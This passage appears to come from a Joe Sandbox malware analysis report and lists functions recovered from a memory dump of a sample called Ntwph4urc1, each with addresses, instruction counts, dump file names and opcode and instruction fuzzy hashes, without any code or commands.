                                            • Opcode Fuzzy Hash: f12ca3b2acced05fecadcdf59cde285bbc34f8445301a10fa8c700101f1cd99f
                                            • Instruction Fuzzy Hash: 4241A2B5D00318DEDB21DFAAD980AEEFBF4BB48300F5041AEE509A7240DB349A85CF51
                                            Function 369592C5 Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                            • Instruction ID: 596be664d3f02038c5210f826ad55b36d068e6ff50743c4a5d533bd020ce4931
                                            • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                            • Instruction Fuzzy Hash: 7D319AB1608359CFDB01CF19D84095A7BE9FF89394F11056AF9549B3A1DB30DC04CBA6
                                            Function 369A7190 Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                            • Instruction ID: e0d7093bc3dae89dfdd0ff57ae26a0d7e65a5677ee73017b08bffe6602254b60
                                            • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                            • Instruction Fuzzy Hash: 7F313879A04306CFC700CF19C894956BBF9FF89354B2585A9E9589B315EB30ED06CB91
                                            Function 36953EF4 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5792c921ca3ca2bbbe232b517931b81ea903973909e8099156e3e3dd86bc70c3
                                            • Instruction ID: 5011067fcdba735513e7e9e499c8b87d5f219571e2221a9956b3aa4d3e4ea70f
                                            • Opcode Fuzzy Hash: 5792c921ca3ca2bbbe232b517931b81ea903973909e8099156e3e3dd86bc70c3
                                            • Instruction Fuzzy Hash: 13214C75A00214EFE711CB9BDC80E9BBBBDEF49A94F524165EA0597210E634EE00DBA0
                                            Function 369F9E56 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ce816f247fe5f563bbaf608dfee83b7551cf858278b173cde6cdafcec51ed29
                                            • Instruction ID: c163e2d0140f6dc0683d43fd3c7215350b7fd9a749ff6f3d540a40439973dd4f
                                            • Opcode Fuzzy Hash: 0ce816f247fe5f563bbaf608dfee83b7551cf858278b173cde6cdafcec51ed29
                                            • Instruction Fuzzy Hash: 9B31E570A107818FD355CF2AC940722BBE9FF85325F25C92DE4A98B291C732DC46CB91
                                            Function 3698D530 Relevance: .1, Instructions: 85COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1edae97d6ea4ed16842b49e1b4e54d6c4a74be82bfc154173f886623df75f161
                                            • Instruction ID: b8ddde26d86f08e29490210c7177340f2c95974df289dcc3e52569df68f3bd50
                                            • Opcode Fuzzy Hash: 1edae97d6ea4ed16842b49e1b4e54d6c4a74be82bfc154173f886623df75f161
                                            • Instruction Fuzzy Hash: BA21D3B29043149BD712DF69CE40B4B77E9EB44668F100817FA04D7252EA35DC15C7E7
                                            Function 3697F32A Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                            • Instruction ID: 686061ffa5ab61619afd911e0f9b90f12a8f057c92a7a0f20315d8d47b4e566d
                                            • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                            • Instruction Fuzzy Hash: DE21A172210300EFD719CF25C941B66BBE9EF853A5F21416EE52A9B391EB70EC01CB95
                                            Function 36989660 Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6a9ac6942d337ca072c6c64a56f47b94405ddea0387f26079e793c65aaa62c7
                                            • Instruction ID: 8186d66aef6b375bf46200b1c2141a9a129c99177bd80ccf7aba9a62fdb9b5f3
                                            • Opcode Fuzzy Hash: e6a9ac6942d337ca072c6c64a56f47b94405ddea0387f26079e793c65aaa62c7
                                            • Instruction Fuzzy Hash: EE212730920711DFF732DA29CC10B0677EAAB412A8F304619E952466A0DA32EC61DBD6
                                            Function 36991FB8 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3929694f3905af1f749a0eb407148cf8a485d6ad2bbe172017e1e65db35563ae
                                            • Instruction ID: 949200f58dad9bf1a59b37407110a03e65fb01e4c367341e8ae93ed5880a14cc
                                            • Opcode Fuzzy Hash: 3929694f3905af1f749a0eb407148cf8a485d6ad2bbe172017e1e65db35563ae
                                            • Instruction Fuzzy Hash: FE21CF75A10308EFE721CF59C944E9ABBF8EB44794F20847AE945EB250D370ED01CBA1
                                            Function 369F71F9 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f9a9c5bade3c5bb3f4782ed2e278a6863f492533294aa7221d0559af3564adf
                                            • Instruction ID: cb66ece4b104b3721d279a3fe5711276c3f1fef0f11e1b0f8484763dc8a51095
                                            • Opcode Fuzzy Hash: 8f9a9c5bade3c5bb3f4782ed2e278a6863f492533294aa7221d0559af3564adf
                                            • Instruction Fuzzy Hash: 4C210831A247414BE310DF259C48B9BB7DDEFC4365F22492DF8A59F140CB62A946C792
                                            Function 369CD0C0 Relevance: .1, Instructions: 73COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                            • Instruction ID: 499f3f43992e7e35ce7a921f8cdb968152b6c3f629ee7f5a6ddf2c3011fcbec3
                                            • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                            • Instruction Fuzzy Hash: A721BE72A44704ABE321DE1DCC41B5ABBE4EB89764F11022AF9489B3A1D734D904C7EA
                                            Function 3697BF60 Relevance: .1, Instructions: 73COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d8ceafc2fc39e92edf86c0c741721bb341c25e2b0edecbeff1869283587d1c6
                                            • Instruction ID: 4450cced830fcbe3b70eb508ac88f697a7efcd0a863be645fd06f61471a1b368
                                            • Opcode Fuzzy Hash: 5d8ceafc2fc39e92edf86c0c741721bb341c25e2b0edecbeff1869283587d1c6
                                            • Instruction Fuzzy Hash: 77219AB5504301CFEB229F55C990B12BBA8EF45758F1180A9D9045F24ACB79E818CFE0
                                            Function 3694B765 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a92826d08234145062ea6202c9eadfff5ac3def47623616f9cf0d83e15803aa
                                            • Instruction ID: 69f67307e3c2bddf986e20e41f8f778ed10f8be5ab7440be08b2098e848698c7
                                            • Opcode Fuzzy Hash: 5a92826d08234145062ea6202c9eadfff5ac3def47623616f9cf0d83e15803aa
                                            • Instruction Fuzzy Hash: 2A215572110B00DFC726EF29CD40B5AB7F5FF08718F244969E106976A2D739E812CB49
                                            Function 369715A9 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                            • Instruction ID: b554150cdb3f993298f8bb999bbd2d717378162f0966e9332f5931c1caaabaae
                                            • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                            • Instruction Fuzzy Hash: AE212375A00785DFF716CB96D854B157FE9EF44798F2900A1ED00CB292EAB8CC00D691
                                            Function 369DFEC5 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e34b89a0714a1f15887dfb34b3c2a395dc54c3538e67f8c68b5fd1ba7be814fc
                                            • Instruction ID: 63355d3e2cc230b191d4706f661fb84e7ee1add802771787c4553ec7c656e64e
                                            • Opcode Fuzzy Hash: e34b89a0714a1f15887dfb34b3c2a395dc54c3538e67f8c68b5fd1ba7be814fc
                                            • Instruction Fuzzy Hash: 7111D2BAA00B12ABD7118E2E8D62751F378BF43378F204735A924936E0C771EC91DAD1
                                            Function 36953720 Relevance: .1, Instructions: 67COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 16bc2dfe0769a57bb1196c32e260ebad8ddc09cd6c8dc4cdab88df5bc74b8a37
                                            • Instruction ID: 0b0492d9dfcbb5baec10e20827ef276e59484f1f1f15fb3184b16e3d8c614234
                                            • Opcode Fuzzy Hash: 16bc2dfe0769a57bb1196c32e260ebad8ddc09cd6c8dc4cdab88df5bc74b8a37
                                            • Instruction Fuzzy Hash: 1E21F6B5E00209CBE702CF6AC4447EEB7B8FF88718F768018DA12672D0DBB89945C765
                                            Function 369ED5B0 Relevance: .1, Instructions: 66COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 227256db81d375ecfc13626cb2ab5827bd77baaff17ec571dfb7d10958618551
                                            • Instruction ID: f008aed3e430982b48bab493e55b09c0aee68832ed44e88cd4198e6b57da4c8f
                                            • Opcode Fuzzy Hash: 227256db81d375ecfc13626cb2ab5827bd77baaff17ec571dfb7d10958618551
                                            • Instruction Fuzzy Hash: 6F11D036620710AFDB22DB24CC40F8AB3ACEF84764F204819E449DB681EB34F905CBA5
                                            Function 369DD080 Relevance: .1, Instructions: 66COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fb00ac86561ee80340644f5d1f65070dba03961e445c597a138fe4c11545ac3d
                                            • Instruction ID: ccd8e1fd5b7e3263ed6cef5c522aff21bc37463f40f0e67f4ef40f0b8a8565ca
                                            • Opcode Fuzzy Hash: fb00ac86561ee80340644f5d1f65070dba03961e445c597a138fe4c11545ac3d
                                            • Instruction Fuzzy Hash: D0110271150350ABD7239B2ACD40F2677ADDB86BB8F20443AFA049B692DA259C02C795
                                            Function 36949240 Relevance: .1, Instructions: 64COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 222d1c0a529010e58d3e8e2da18d8b22f1b431312bc2be6ec9ea66a9d31fc3ac
                                            • Instruction ID: d748e73b70d23f96d645aa975eb236480606abc1ab41b80188ff874736bc1d84
                                            • Opcode Fuzzy Hash: 222d1c0a529010e58d3e8e2da18d8b22f1b431312bc2be6ec9ea66a9d31fc3ac
                                            • Instruction Fuzzy Hash: 9711387A021300EAE317DF5ACC40A61B7FAEB54780F604125EA00A7351D736DC03CB61
                                            Function 3698BFEC Relevance: .1, Instructions: 64COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93ea5ff9c7ef82980552898ac6f5edaeac6dba0cb97dfe569ac421cfc6f0bf37
                                            • Instruction ID: 28d01c63efb11306a99d7c4d84d7d12300087011e1ccf7258840c92cc1e72346
                                            • Opcode Fuzzy Hash: 93ea5ff9c7ef82980552898ac6f5edaeac6dba0cb97dfe569ac421cfc6f0bf37
                                            • Instruction Fuzzy Hash: FE1133BD2117A0CFF3248B2AC4A07A1B3E8FB0239CF24045AE9818B740CB69DC81D710
                                            Function 369ED660 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84d8c099071c2c2e27e0d7cc270b2f1a9f3cfe9a568463a6261584609a9bdb37
                                            • Instruction ID: 91b41b86628142e27a06c34b48a6424d4340903690a0c977c5c7e149e3060173
                                            • Opcode Fuzzy Hash: 84d8c099071c2c2e27e0d7cc270b2f1a9f3cfe9a568463a6261584609a9bdb37
                                            • Instruction Fuzzy Hash: 54112779A00704AFEB02DF65C840B8ABBF9FF85B94F20445AD88AD7301D770E905CB50
                                            Function 369DD250 Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e77ec6ec8e9228795767ae3dafa344363aeede021f43d121e9d910d2861e0d55
                                            • Instruction ID: c7494a427b09ef4a0a62877ee4d5307b9eae379d296dce8ac7320b69f6fe10b3
                                            • Opcode Fuzzy Hash: e77ec6ec8e9228795767ae3dafa344363aeede021f43d121e9d910d2861e0d55
                                            • Instruction Fuzzy Hash: AA0149BB954310A7D722866BCC84B9B721CDB886BCF614535BF144B342DA29CC4BC3E2
                                            Function 36A0D6F0 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                            • Instruction ID: c5598f13fe1cb169781d214f0470e9ec697723794eb53ab8b61271b9d2f7c1af
                                            • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                            • Instruction Fuzzy Hash: 9E015E76B00209AB9B05EAA6ED44DAF7BBDEF85B94F004059A905D7200E730EA05CB60
                                            Function 3697B052 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b32b233a44770261a32a0fcef46cc351dca660069a8518558eaf0a0b1d28ebe4
                                            • Instruction ID: c14ade732fb669c8cdbc2f0740d91429bda7d12b8511746244f298d8fa1930bd
                                            • Opcode Fuzzy Hash: b32b233a44770261a32a0fcef46cc351dca660069a8518558eaf0a0b1d28ebe4
                                            • Instruction Fuzzy Hash: 4A019676B003446FE710DF6ADD80FABB6FDDF84254F140469E605D7245DA74E901C662
                                            Function 36947330 Relevance: .1, Instructions: 55COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c8a729c4f15dfceb76c06f436936d193db9bf3752707f0355390582239090911
                                            • Instruction ID: 0e21c2530e82dde0b4059b3d9cb2a4a2729dc8618b1f1f0a2069907f0a04413e
                                            • Opcode Fuzzy Hash: c8a729c4f15dfceb76c06f436936d193db9bf3752707f0355390582239090911
                                            • Instruction Fuzzy Hash: EF11A076A00718AFE722DF59DC55B9B77E8EB44358F114829E985CB211D735EC00CBA1
